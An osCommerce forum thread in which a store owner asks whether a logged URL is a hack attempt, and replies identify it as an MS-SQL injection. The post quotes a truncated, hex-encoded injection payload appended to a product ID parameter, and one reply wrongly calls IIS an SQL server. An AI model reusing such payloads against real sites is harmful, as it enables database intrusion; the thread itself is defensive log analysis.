Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Is this a hack attempt


Brian-Bear

Recommended Posts

Posted

I have seen this in my last urls list and looks a bit nasty. What are they trying to do?

 

product_info.php?products_id=1649;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172

283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073

6

56C6563742061

 

any ideas

Posted

I can't say what it's trying but I'd agree that it looks a little suspicious and more than just spam.

Posted
I have seen this in my last urls list and looks a bit nasty. What are they trying to do?

 

product_info.php?products_id=1649;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292...

 

any ideas

Well it appears to be an IIS / ms-sql injection attack. Looks like you only need to worry about it if your SQL server is Microsoft IIS. Since we're using mySQL for osCommerce (and not ms-sql) then no worries, other than the pain of seeing the request in your logs and the extra bandwidth it generates! :)

 

If you put "CHAR(4000) injection attack" into Google you can find out about it.

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...